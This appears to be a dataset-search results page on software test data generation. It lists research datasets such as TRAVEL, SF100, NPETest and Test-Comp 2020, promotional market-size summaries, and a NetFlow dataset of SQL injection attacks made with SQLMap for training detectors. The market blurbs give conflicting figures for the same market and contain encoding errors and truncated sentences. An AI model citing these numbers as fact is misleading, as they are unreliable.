Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries: Appendix".
The appendix contains:
Facebook
Twitterhttps://www.wiseguyreports.com/pages/privacy-policyhttps://www.wiseguyreports.com/pages/privacy-policy
| BASE YEAR | 2024 |
| HISTORICAL DATA | 2019 - 2023 |
| REGIONS COVERED | North America, Europe, APAC, South America, MEA |
| REPORT COVERAGE | Revenue Forecast, Competitive Landscape, Growth Factors, and Trends |
| MARKET SIZE 2024 | 3.08(USD Billion) |
| MARKET SIZE 2025 | 3.56(USD Billion) |
| MARKET SIZE 2035 | 15.0(USD Billion) |
| SEGMENTS COVERED | Application, Deployment Type, End User, Testing Type, Regional |
| COUNTRIES COVERED | US, Canada, Germany, UK, France, Russia, Italy, Spain, Rest of Europe, China, India, Japan, South Korea, Malaysia, Thailand, Indonesia, Rest of APAC, Brazil, Mexico, Argentina, Rest of South America, GCC, South Africa, Rest of MEA |
| KEY MARKET DYNAMICS | Increasing demand for data privacy, Need for regulatory compliance, Rising importance of data quality, Growth of DevOps and Agile methodologies, Expanding cloud adoption and integration |
| MARKET FORECAST UNITS | USD Billion |
| KEY COMPANIES PROFILED | Informatica, IBM, Delphix, Oracle, Deloitte, DataMill, SAP, Micro Focus, Microsoft, Parasoft, GenRocket, Test Data Solutions, Tricentis |
| MARKET FORECAST PERIOD | 2025 - 2035 |
| KEY MARKET OPPORTUNITIES | Increased demand for automation, Growing need for data privacy, Rising adoption of DevOps practices, Expansion of cloud-based solutions, Surge in AI-driven testing tools |
| COMPOUND ANNUAL GROWTH RATE (CAGR) | 15.5% (2025 - 2035) |
Facebook
Twitter
According to our latest research, the global synthetic test data generation market size reached USD 1.85 billion in 2024 and is projected to grow at a robust CAGR of 31.2% during the forecast period, reaching approximately USD 21.65 billion by 2033. The marketÂ’s remarkable growth is primarily driven by the increasing demand for high-quality, privacy-compliant data to support software testing, AI model training, and data privacy initiatives across multiple industries. As organizations strive to meet stringent regulatory requirements and accelerate digital transformation, the adoption of synthetic test data generation solutions is surging at an unprecedented rate.
A key growth factor for the synthetic test data generation market is the rising awareness and enforcement of data privacy regulations such as GDPR, CCPA, and HIPAA. These regulations have compelled organizations to rethink their data management strategies, particularly when it comes to using real data in testing and development environments. Synthetic data offers a powerful alternative, allowing companies to generate realistic, risk-free datasets that mirror production data without exposing sensitive information. This capability is particularly vital for sectors like BFSI and healthcare, where data breaches can have severe financial and reputational repercussions. As a result, businesses are increasingly investing in synthetic test data generation tools to ensure compliance, reduce liability, and enhance data security.
Another significant driver is the explosive growth in artificial intelligence and machine learning applications. AI and ML models require vast amounts of diverse, high-quality data for effective training and validation. However, obtaining such data can be challenging due to privacy concerns, data scarcity, or labeling costs. Synthetic test data generation addresses these challenges by producing customizable, labeled datasets that can be tailored to specific use cases. This not only accelerates model development but also improves model robustness and accuracy by enabling the creation of edge cases and rare scenarios that may not be present in real-world data. The synergy between synthetic data and AI innovation is expected to further fuel market expansion throughout the forecast period.
The increasing complexity of software systems and the shift towards DevOps and continuous integration/continuous deployment (CI/CD) practices are also propelling the adoption of synthetic test data generation. Modern software development requires rapid, iterative testing across a multitude of environments and scenarios. Relying on masked or anonymized production data is often insufficient, as it may not capture the full spectrum of conditions needed for comprehensive testing. Synthetic data generation platforms empower development teams to create targeted datasets on demand, supporting rigorous functional, performance, and security testing. This leads to faster release cycles, reduced costs, and higher software quality, making synthetic test data generation an indispensable tool for digital enterprises.
In the realm of synthetic test data generation, Synthetic Tabular Data Generation Software plays a crucial role. This software specializes in creating structured datasets that resemble real-world data tables, making it indispensable for industries that rely heavily on tabular data, such as finance, healthcare, and retail. By generating synthetic tabular data, organizations can perform extensive testing and analysis without compromising sensitive information. This capability is particularly beneficial for financial institutions that need to simulate transaction data or healthcare providers looking to test patient management systems. As the demand for privacy-compliant data solutions grows, the importance of synthetic tabular data generation software is expected to increase, driving further innovation and adoption in the market.
From a regional perspective, North America currently leads the synthetic test data generation market, accounting for the largest share in 2024, followed closely by Europe and Asia Pacific. The dominance of North America can be attributed to the presence of major technology providers, early adoption of advanced testing methodologies, and a strong regulatory focus on data privacy. EuropeÂ’s stringent privacy regulations an
Facebook
Twitterhttps://www.datainsightsmarket.com/privacy-policyhttps://www.datainsightsmarket.com/privacy-policy
The Data Creation Tool market is booming, projected to reach $27.2 Billion by 2033, with a CAGR of 18.2%. Discover key trends, leading companies (Informatica, Delphix, Broadcom), and regional market insights in this comprehensive analysis. Explore how synthetic data generation is transforming software development, AI, and data analytics.
Facebook
Twitterhttps://www.verifiedmarketresearch.com/privacy-policy/https://www.verifiedmarketresearch.com/privacy-policy/
Test Data Management Market size was valued at USD 1.54 Billion in 2024 and is projected to reach USD 2.97 Billion by 2032, growing at a CAGR of 11.19% from 2026 to 2032.
Test Data Management Market Drivers
Increasing Data Volumes: The exponential growth in data generated by businesses necessitates efficient management of test data. Effective TDM solutions help organizations handle large volumes of data, ensuring accurate and reliable testing processes.
Need for Regulatory Compliance: Stringent data privacy regulations, such as GDPR, HIPAA, and CCPA, require organizations to protect sensitive data. TDM solutions help ensure compliance by masking or anonymizing sensitive data used in testing environments.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This repository hosts the Testing Roads for Autonomous VEhicLes (TRAVEL) dataset. TRAVEL is an extensive collection of virtual roads that have been used for testing lane assist/keeping systems (i.e., driving agents) and data from their execution in state of the art, physically accurate driving simulator, called BeamNG.tech. Virtual roads consist of sequences of road points interpolated using Cubic splines.
Along with the data, this repository contains instructions on how to install the tooling necessary to generate new data (i.e., test cases) and analyze them in the context of test regression. We focus on test selection and test prioritization, given their importance for developing high-quality software following the DevOps paradigms.
This dataset builds on top of our previous work in this area, including work on
test generation (e.g., AsFault, DeepJanus, and DeepHyperion) and the SBST CPS tool competition (SBST2021),
test selection: SDC-Scissor and related tool
test prioritization: automated test cases prioritization work for SDCs.
Dataset Overview
The TRAVEL dataset is available under the data folder and is organized as a set of experiments folders. Each of these folders is generated by running the test-generator (see below) and contains the configuration used for generating the data (experiment_description.csv), various statistics on generated tests (generation_stats.csv) and found faults (oob_stats.csv). Additionally, the folders contain the raw test cases generated and executed during each experiment (test..json).
The following sections describe what each of those files contains.
Experiment Description
The experiment_description.csv contains the settings used to generate the data, including:
Time budget. The overall generation budget in hours. This budget includes both the time to generate and execute the tests as driving simulations.
The size of the map. The size of the squared map defines the boundaries inside which the virtual roads develop in meters.
The test subject. The driving agent that implements the lane-keeping system under test. The TRAVEL dataset contains data generated testing the BeamNG.AI and the end-to-end Dave2 systems.
The test generator. The algorithm that generated the test cases. The TRAVEL dataset contains data obtained using various algorithms, ranging from naive and advanced random generators to complex evolutionary algorithms, for generating tests.
The speed limit. The maximum speed at which the driving agent under test can travel.
Out of Bound (OOB) tolerance. The test cases' oracle that defines the tolerable amount of the ego-car that can lie outside the lane boundaries. This parameter ranges between 0.0 and 1.0. In the former case, a test failure triggers as soon as any part of the ego-vehicle goes out of the lane boundary; in the latter case, a test failure triggers only if the entire body of the ego-car falls outside the lane.
Experiment Statistics
The generation_stats.csv contains statistics about the test generation, including:
Total number of generated tests. The number of tests generated during an experiment. This number is broken down into the number of valid tests and invalid tests. Valid tests contain virtual roads that do not self-intersect and contain turns that are not too sharp.
Test outcome. The test outcome contains the number of passed tests, failed tests, and test in error. Passed and failed tests are defined by the OOB Tolerance and an additional (implicit) oracle that checks whether the ego-car is moving or standing. Tests that did not pass because of other errors (e.g., the simulator crashed) are reported in a separated category.
The TRAVEL dataset also contains statistics about the failed tests, including the overall number of failed tests (total oob) and its breakdown into OOB that happened while driving left or right. Further statistics about the diversity (i.e., sparseness) of the failures are also reported.
Test Cases and Executions
Each test..json contains information about a test case and, if the test case is valid, the data observed during its execution as driving simulation.
The data about the test case definition include:
The road points. The list of points in a 2D space that identifies the center of the virtual road, and their interpolation using cubic splines (interpolated_points)
The test ID. The unique identifier of the test in the experiment.
Validity flag and explanation. A flag that indicates whether the test is valid or not, and a brief message describing why the test is not considered valid (e.g., the road contains sharp turns or the road self intersects)
The test data are organized according to the following JSON Schema and can be interpreted as RoadTest objects provided by the tests_generation.py module.
{ "type": "object", "properties": { "id": { "type": "integer" }, "is_valid": { "type": "boolean" }, "validation_message": { "type": "string" }, "road_points": { §\label{line:road-points}§ "type": "array", "items": { "$ref": "schemas/pair" }, }, "interpolated_points": { §\label{line:interpolated-points}§ "type": "array", "items": { "$ref": "schemas/pair" }, }, "test_outcome": { "type": "string" }, §\label{line:test-outcome}§ "description": { "type": "string" }, "execution_data": { "type": "array", "items": { "$ref" : "schemas/simulationdata" } } }, "required": [ "id", "is_valid", "validation_message", "road_points", "interpolated_points" ] }
Finally, the execution data contain a list of timestamped state information recorded by the driving simulation. State information is collected at constant frequency and includes absolute position, rotation, and velocity of the ego-car, its speed in Km/h, and control inputs from the driving agent (steering, throttle, and braking). Additionally, execution data contain OOB-related data, such as the lateral distance between the car and the lane center and the OOB percentage (i.e., how much the car is outside the lane).
The simulation data adhere to the following (simplified) JSON Schema and can be interpreted as Python objects using the simulation_data.py module.
{ "$id": "schemas/simulationdata", "type": "object", "properties": { "timer" : { "type": "number" }, "pos" : { "type": "array", "items":{ "$ref" : "schemas/triple" } } "vel" : { "type": "array", "items":{ "$ref" : "schemas/triple" } } "vel_kmh" : { "type": "number" }, "steering" : { "type": "number" }, "brake" : { "type": "number" }, "throttle" : { "type": "number" }, "is_oob" : { "type": "number" }, "oob_percentage" : { "type": "number" } §\label{line:oob-percentage}§ }, "required": [ "timer", "pos", "vel", "vel_kmh", "steering", "brake", "throttle", "is_oob", "oob_percentage" ] }
Dataset Content
The TRAVEL dataset is a lively initiative so the content of the dataset is subject to change. Currently, the dataset contains the data collected during the SBST CPS tool competition, and data collected in the context of our recent work on test selection (SDC-Scissor work and tool) and test prioritization (automated test cases prioritization work for SDCs).
SBST CPS Tool Competition Data
The data collected during the SBST CPS tool competition are stored inside data/competition.tar.gz. The file contains the test cases generated by Deeper, Frenetic, AdaFrenetic, and Swat, the open-source test generators submitted to the competition and executed against BeamNG.AI with an aggression factor of 0.7 (i.e., conservative driver).
Name
Map Size (m x m)
Max Speed (Km/h)
Budget (h)
OOB Tolerance (%)
Test Subject
DEFAULT
200 × 200
120
5 (real time)
0.95
BeamNG.AI - 0.7
SBST
200 × 200
70
2 (real time)
0.5
BeamNG.AI - 0.7
Specifically, the TRAVEL dataset contains 8 repetitions for each of the above configurations for each test generator totaling 64 experiments.
SDC Scissor
With SDC-Scissor we collected data based on the Frenetic test generator. The data is stored inside data/sdc-scissor.tar.gz. The following table summarizes the used parameters.
Name
Map Size (m x m)
Max Speed (Km/h)
Budget (h)
OOB Tolerance (%)
Test Subject
SDC-SCISSOR
200 × 200
120
16 (real time)
0.5
BeamNG.AI - 1.5
The dataset contains 9 experiments with the above configuration. For generating your own data with SDC-Scissor follow the instructions in its repository.
Dataset Statistics
Here is an overview of the TRAVEL dataset: generated tests, executed tests, and faults found by all the test generators grouped by experiment configuration. Some 25,845 test cases are generated by running 4 test generators 8 times in 2 configurations using the SBST CPS Tool Competition code pipeline (SBST in the table). We ran the test generators for 5 hours, allowing the ego-car a generous speed limit (120 Km/h) and defining a high OOB tolerance (i.e., 0.95), and we also ran the test generators using a smaller generation budget (i.e., 2 hours) and speed limit (i.e., 70 Km/h) while setting the OOB tolerance to a lower value (i.e., 0.85). We also collected some 5, 971 additional tests with SDC-Scissor (SDC-Scissor in the table) by running it 9 times for 16 hours using Frenetic as a test generator and defining a more realistic OOB tolerance (i.e., 0.50).
Generating new Data
Generating new data, i.e., test cases, can be done using the SBST CPS Tool Competition pipeline and the driving simulator BeamNG.tech.
Extensive instructions on how to install both software are reported inside the SBST CPS Tool Competition pipeline Documentation;
Facebook
Twitterhttps://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy
The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others. The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving the market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to the rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.
Facebook
Twitterhttps://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
According to our latest research, the global synthetic IoT data generation market size stood at USD 1.15 billion in 2024, with a robust compound annual growth rate (CAGR) of 36.8% expected from 2025 to 2033. This trajectory will drive the market to a projected value of USD 17.8 billion by 2033. The market's exponential growth is attributed to the surging demand for high-quality, privacy-compliant, and scalable data for Internet of Things (IoT) applications across diverse industries. As per the latest research, the adoption of synthetic data generation solutions is accelerating as enterprises seek to overcome challenges related to data availability, privacy, and regulatory compliance, thereby fueling innovation and operational efficiency in IoT ecosystems worldwide.
The primary growth factor for the synthetic IoT data generation market is the increasing need for vast, diverse, and high-fidelity data to train, validate, and test IoT systems, particularly in environments where real-world data is either insufficient, sensitive, or unavailable. As IoT deployments proliferate across sectors such as healthcare, automotive, manufacturing, and smart cities, the complexity and variety of data needed for robust algorithm development have grown exponentially. Synthetic data generation enables organizations to simulate a wide range of scenarios, edge cases, and rare events, ensuring that IoT solutions are more resilient, accurate, and secure. This capability not only accelerates product development cycles but also reduces dependency on costly and time-consuming real-world data collection efforts, making it an indispensable tool for modern IoT-driven enterprises.
Another significant driver is the heightened focus on data privacy and regulatory compliance. With the introduction of stringent data protection laws such as GDPR in Europe, CCPA in California, and similar regulations worldwide, organizations are under increasing pressure to minimize the use of actual personal or sensitive data in their IoT applications. Synthetic data, by its very nature, eliminates direct identifiers and can be generated to mimic real data distributions without exposing actual user information. This makes it an ideal solution for organizations seeking to comply with global privacy mandates while still gaining actionable insights from IoT data. As regulators continue to tighten data usage norms, the adoption of synthetic IoT data generation tools is expected to surge, further propelling market growth.
Technological advancements in artificial intelligence and machine learning have also played a pivotal role in shaping the synthetic IoT data generation market. Modern synthetic data platforms leverage advanced AI models, such as generative adversarial networks (GANs) and variational autoencoders (VAEs), to produce highly realistic and contextually rich datasets that mirror the complexity of real-world IoT environments. This has enabled organizations to simulate intricate sensor networks, device interactions, and environmental variables with remarkable accuracy. As the technology matures, the fidelity and utility of synthetic data continue to improve, opening new avenues for innovation in IoT analytics, predictive maintenance, and autonomous systems. The convergence of AI and IoT is thus creating a virtuous cycle, driving demand for synthetic data solutions that empower next-generation digital transformation initiatives.
From a regional perspective, North America currently dominates the synthetic IoT data generation market, driven by the presence of leading technology providers, a mature IoT ecosystem, and a strong emphasis on research and development. The region's early adoption of AI, coupled with a proactive regulatory stance on data privacy, has fostered a conducive environment for synthetic data innovation. Meanwhile, Asia Pacific is emerging as the fastest-growing market, fueled by rapid industrialization, smart city initiatives, and increasing investments in IoT infrastructure across countries such as China, India, and Japan. Europe follows closely, with its focus on data protection and digital transformation. Other regions, including Latin America and the Middle East & Africa, are gradually catching up, leveraging synthetic data to overcome local data scarcity and regulatory hurdles. Overall, the global landscape is witnessing a convergence of technological, regulatory, and market forces that are collectively driving the adoption of synthetic IoT data generation solutions.<b
Facebook
Twitterhttps://www.datainsightsmarket.com/privacy-policyhttps://www.datainsightsmarket.com/privacy-policy
The global database testing tool market size was valued at USD 2,504.2 million in 2025 and is projected to reach USD 19,405.8 million by 2033, exhibiting a CAGR of 33.6% during the forecast period. The growth of the market is attributed to the rising demand for ensuring the accuracy and reliability of database systems, increasing adoption of cloud-based database testing tools, and growing need for automated database testing solutions to improve efficiency. Key market trends include the advancement of artificial intelligence (AI) and machine learning (ML) technologies in database testing tools, which enables automated test case generation, data validation, and performance optimization. Additionally, the increasing adoption of agile development methodologies and DevOps practices has led to the demand for continuous database testing tools that can integrate seamlessly with CI/CD pipelines. The market is also witnessing the emergence of database testing tools specifically designed for specific database types, such as NoSQL and NewSQL databases, to meet the unique testing requirements of these systems.
Facebook
TwitterThe NIST BGP RPKI IO framework (BRIO) is a test tool only subset of the BGP-SRx Framework. It is an open source implementation and test platform that allows the synthetic generation of test data for emerging BGP security extensions such as RPKI Origin Validation and BGPSec Path Validation and ASPA validation. BRIO is designed in such that it allows the creation of stand alone testbeds, loaded with freely configurable scenarios to study secure BGP implementations. As a result, much functionality is provided.
Facebook
Twitterhttps://www.technavio.com/content/privacy-noticehttps://www.technavio.com/content/privacy-notice
AI Testing And Validation Market Size 2025-2029
The ai testing and validation market size is valued to increase by USD 806.7 million, at a CAGR of 18.3% from 2024 to 2029. Proliferation of complex AI models, particularly generative AI will drive the ai testing and validation market.
Market Insights
North America dominated the market and accounted for a 40% growth during the 2025-2029.
By Application - Test automation segment was valued at USD 218.70 million in 2023
By Deployment - Cloud based segment accounted for the largest market revenue share in 2023
Market Size & Forecast
Market Opportunities: USD 360.90 million
Market Future Opportunities 2024: USD 806.70 million
CAGR from 2024 to 2029 : 18.3%
Market Summary
The market is witnessing significant growth due to the increasing adoption of artificial intelligence (AI) technologies across various industries. The proliferation of complex AI models, particularly generative AI, is driving the need for robust testing and validation processes to ensure accuracy, reliability, and security. The convergence of AI validation with MLOps (Machine Learning Operations) and the shift left imperative are key trends shaping the market. The black box nature of advanced AI systems poses a challenge in testing and validation, as traditional testing methods may not be effective. Organizations are seeking standardized metrics and tools to assess the performance, fairness, and explainability of AI models. For instance, in a supply chain optimization scenario, a retailer uses AI to predict demand and optimize inventory levels. Effective AI testing and validation are crucial to ensure the accuracy of demand forecasts, maintain compliance with regulations, and improve operational efficiency. In conclusion, the market is a critical enabler for the successful deployment and integration of AI systems in businesses worldwide. As AI technologies continue to evolve, the demand for reliable testing and validation solutions will only grow.
What will be the size of the AI Testing And Validation Market during the forecast period?
Get Key Insights on Market Forecast (PDF) Request Free SampleThe market continues to evolve, with companies increasingly recognizing the importance of ensuring the accuracy, reliability, and ethical use of artificial intelligence models. AI model testing and validation encompass various aspects, including test coverage, model monitoring, debugging, and compliance. According to recent studies, companies have seen a significant improvement in model explainability and quality assurance through rigorous testing and validation processes. For instance, implementing AI model governance has led to a 25% reduction in bias mitigation incidents. Furthermore, AI test results have become a crucial factor in product strategy, as they directly impact compliance and budgeting decisions. AI testing tools and strategies have advanced significantly, offering more efficient test reporting and risk assessment capabilities. As AI models become more integrated into business operations, the need for robust testing and validation processes will only grow.
Unpacking the AI Testing And Validation Market Landscape
In the realm of software development, Artificial Intelligence (AI) is increasingly being integrated into testing and validation processes to enhance efficiency and accuracy. Compared to traditional testing methods, AI testing solutions offer a 30% faster test execution rate, enabling continuous delivery and integration. Furthermore, AI model testing and validation result in a 25% reduction in false positives, improving Return on Investment (ROI) by minimizing unnecessary rework.
Test data management and generation are streamlined through AI-driven synthetic data generation, ensuring reliable performance benchmarking and compliance alignment. AI also plays a crucial role in bias detection and fairness evaluation, enhancing system trustworthiness and user experience.
Continuous integration and delivery are facilitated by automated AI testing frameworks, offering robustness evaluation, scalability testing, and behavior-driven development. Regression testing and performance testing are also optimized through AI, ensuring model interpretability and explainable AI metrics.
Security audits are strengthened with AI-driven vulnerability detection and adversarial attack testing, safeguarding against potential threats and maintaining system reliability. Overall, AI integration in testing and validation processes leads to improved efficiency, accuracy, and security, making it an essential component of modern software development.
Key Market Drivers Fueling Growth
The proliferation of intricate artificial intelligence models, with a notable focus on generative AI, serves as the primary catalyst for market growth. The market is experiencing significant growth due to
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Attribute Information
test case generation; unit testing; search-based software engineering; benchmark
Paper Abstract
Several promising techniques have been proposed to automate different tasks in software testing, such as test data generation for object-oriented software. However, reported studies in the literature only show the feasibility of the proposed techniques, because the choice of the employed artifacts in the case studies (e.g., software applications) is usually done in a non-systematic way. The chosen case study might be biased, and so it might not be a valid representative of the addressed type of software (e.g., internet applications and embedded systems). The common trend seems to be to accept this fact and get over it by simply discussing it in a threats to validity section. In this paper, we evaluate search-based software testing (in particular the EvoSuite tool) when applied to test data generation for open source projects. To achieve sound empirical results, we randomly selected 100 Java projects from SourceForge, which is the most popular open source repository (more than 300,000 projects with more than two million registered users). The resulting case study not only is very large (8,784 public classes for a total of 291,639 bytecode level branches), but more importantly it is statistically sound and representative for open source projects. Results show that while high coverage on commonly used types of classes is achievable, in practice environmental dependencies prohibit such high coverage, which clearly points out essential future research directions. To support this future research, our SF100 case study can serve as a much needed corpus of classes for test generation.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This is to provide all contents of our work, NPETest, including all raw experimental data used in our paper which will be published at ASE`24.
NPETest is an unit test generation tool for Java projects, which utilizes both static and dynamic analysis techniques for effective NPE detection. This tool is implemented on the top of EvoSuite, a publicly available unit test generation tool for Java.
For more technical details, please read our paper which will be published at ASE`24.
The descriptions for the uploaded files are as follows:
npetest_result.zip: results of NPETest for all benchmarks, containing the generated test-cases
evosuite_opt_result.zip: results of EvoSuite with fine-tuned options for all benchmarks, containing the generated test-cases
evosuite_def_result.zip: results of EvoSuite with default options for all benchmarks, containing the generated test-cases
randoop_NPEX.tar.gz: results of Randoop for NPEX benchmarks, containing only the log-files.
randoop_other.tar.gz: results of Randoop for Bears, BugSwarm, Defects4J, Genesis benchmarks, containing only the log-files.
subject_gits.tar.gz: information of the buggy version for each benchmark.
NPETestArtifact-main.zip: all contents of NPETest from the public Github respository NPETestArtifact.
The detailed description for NPETest (e.g., Install, Usage) of the tool is available on the public repository: NPETestArtifact.
You can also download VM from the following link: Zenodo
Facebook
TwitterMIT Licensehttps://opensource.org/licenses/MIT
License information was derived automatically
Description: This dataset contains 5 sample PDF Electronic Health Records (EHRs), generated as part of a synthetic healthcare data project. The purpose of this dataset is to assist with sales distribution, offering potential users and stakeholders a glimpse of how synthetic EHRs can look and function. These records have been crafted to mimic realistic admission data while ensuring privacy and compliance with all data protection regulations.
Key Features: 1. Synthetic Data: Entirely artificial data created for testing and demonstration purposes. 1. PDF Format: Records are presented in PDF format, commonly used in healthcare systems. 1. Diverse Use Cases: Useful for evaluating tools related to data parsing, machine learning in healthcare, or EHR management systems. 1. Rich Admission Details: Includes admission-related data that highlights the capabilities of synthetic EHR generation.
Potential Use Cases:
Feel free to use this dataset for non-commercial testing and demonstration purposes. Feedback and suggestions for improvements are always welcome!
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Replication package for the 2025 edition of the Java Testing Tool Competition at SBFT.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This archive contains the results of the 2nd Competition on Software Testing (Test-Comp 2020) https://test-comp.sosy-lab.org/2020/
The competition was run by Dirk Beyer, LMU Munich, Germany. More information is available in the following article: Dirk Beyer. Second Competition on Software Testing: Test-Comp 2020. In Proceedings of the 23rd International Conference on Fundamental Approaches to Software Engineering (FASE 2020, Dublin, April 28-30), 2020. Springer. https://doi.org/10.1007/978-3-030-45234-6_25
Copyright (C) Dirk Beyer https://www.sosy-lab.org/people/beyer/
SPDX-License-Identifier: CC-BY-4.0 https://spdx.org/licenses/CC-BY-4.0.html
To browse the competition results with a web browser, there are two options: - start a local web server using php -S localhost:8000 in order to view the data in this archive, or - browse https://test-comp.sosy-lab.org/2020/results/ in order to view the data on the Test-Comp web page.
Contents:
index.html directs to the overview web page LICENSE.txt specifies the license README.txt this file results-validated/ results of coverage-validation runs results-verified/ results of test-generation runs and aggregated results
The folder results-validated/ contains the results from coverage-validation runs:
The folder results-verified/ contains the results from test-generation runs and aggregated results:
index.html overview web page with rankings and score table design.css HTML style definitions *.xml.bz2 XML results from BenchExec *.merged.xml.bz2 XML results from BenchExec, status adjusted according to the validation results *.logfiles.zip output from tools *.json.gz mapping from files names to SHA 256 hashes for the file content *.xml.bz2.table.html HTML views on the detailed results data as generated by BenchExec's table generator .All.table.html HTML views of the full benchmark set (all categories) for each tool META_.table.html HTML views of the benchmark set for each meta category for each tool, and over all tools *.table.html HTML views of the benchmark set for each category over all tools iZeCa0gaey.html HTML views per tool
quantilePlot-* score-based quantile plots as visualization of the results quantilePlotShow.gp example Gnuplot script to generate a plot score* accumulated score results in various formats
The hashes of the file names (in the files *.json.gz) are useful for - validating the exact contents of a file and - accessing the files from the witness store.
Overview over archives from Test-Comp 2020 that are available at Zenodo:
https://doi.org/10.5281/zenodo.3678275 Witness store (containing the generated test suites) https://doi.org/10.5281/zenodo.3678264 Results (XML result files, log files, file mappings, HTML tables) https://doi.org/10.5281/zenodo.3678250 Test tasks, version testcomp20 https://doi.org/10.5281/zenodo.3574420 BenchExec, version 2.5.1
All benchmarks were executed for Test-Comp 2020, https://test-comp.sosy-lab.org/2020/ by Dirk Beyer, LMU Munich based on the components git@github.com:sosy-lab/sv-benchmarks.git testcomp20-0-gd6cd3e5dd4 git@gitlab.com:sosy-lab/test-comp/bench-defs.git testcomp19-84-gac76836 git@github.com:sosy-lab/benchexec.git 2.5.1-0-gffad635
Feel free to contact me in case of questions: https://www.sosy-lab.org/people/beyer/
Facebook
Twitter
According to our latest research, the global synthetic data for security market size reached USD 1.42 billion in 2024, with a robust year-on-year growth trajectory. The market is expected to expand at a CAGR of 36.8% from 2025 to 2033, projecting a substantial increase to USD 19.82 billion by 2033. This exceptional growth is primarily driven by the escalating demand for advanced data security solutions and the rising adoption of artificial intelligence (AI) and machine learning (ML) technologies that rely on synthetic data for secure and compliant data modeling. As organizations worldwide intensify their focus on data privacy and regulatory compliance, synthetic data solutions have emerged as a critical tool for mitigating security risks and enhancing cyber resilience.
One of the primary growth factors fueling the synthetic data for security market is the exponential increase in data breaches and cyberattacks across industries. With the proliferation of digital transformation initiatives, organizations are generating and managing unprecedented volumes of sensitive data, making them attractive targets for malicious actors. Traditional security measures often fall short in protecting against sophisticated cyber threats, creating a pressing need for innovative approaches such as synthetic data generation. By leveraging synthetic data, security teams can simulate various attack scenarios, test their defense mechanisms, and train AI-based threat detection models without exposing real, sensitive information. This not only enhances the efficacy of security protocols but also ensures compliance with stringent data protection regulations such as GDPR, HIPAA, and CCPA.
Another significant driver for the market is the growing complexity of regulatory landscapes governing data privacy and protection. Enterprises, especially those operating in highly regulated sectors like banking, financial services, insurance (BFSI), and healthcare, face mounting pressure to safeguard customer data while maintaining operational agility. Synthetic data offers a compelling solution by enabling organizations to generate realistic yet anonymized datasets that can be used for security analytics, fraud detection, and identity management. This approach minimizes the risk of data leakage and supports continuous innovation in security technologies. Moreover, advancements in AI and ML algorithms for synthetic data generation have further improved the quality and utility of these datasets, making them increasingly indispensable for modern security operations.
The rapid adoption of cloud computing and the shift towards remote and hybrid work environments have also contributed to the surge in demand for synthetic data solutions in security. As enterprises migrate their workloads to cloud-based platforms, the attack surface expands, necessitating more sophisticated and scalable security measures. Synthetic data enables organizations to conduct comprehensive security testing and vulnerability assessments in dynamic cloud environments without compromising real user data. Additionally, the integration of synthetic data into security operations centers (SOCs) and threat intelligence platforms empowers security analysts to proactively identify and mitigate emerging risks. This trend is particularly pronounced in sectors such as IT and telecommunications, where the pace of digital innovation demands agile and resilient security frameworks.
As the synthetic data for security market continues to evolve, organizations are increasingly recognizing the importance of Synthetic Data Liability Insurance. This type of insurance is becoming crucial for companies that generate and utilize synthetic data, as it provides coverage against potential liabilities arising from data breaches, misuse, or inaccuracies in synthetic datasets. By securing liability insurance, businesses can mitigate financial risks and demonstrate their commitment to responsible data practices. This is particularly important in industries where data integrity and compliance are paramount, such as healthcare and finance. As the adoption of synthetic data grows, so does the need for comprehensive insurance solutions that address the unique challenges and risks associated with this innovative technology.
From a regional perspective, North America continues
Facebook
TwitterIntroduction This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device. Datasets The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5. Dataset Aim Samples Benign-malicious
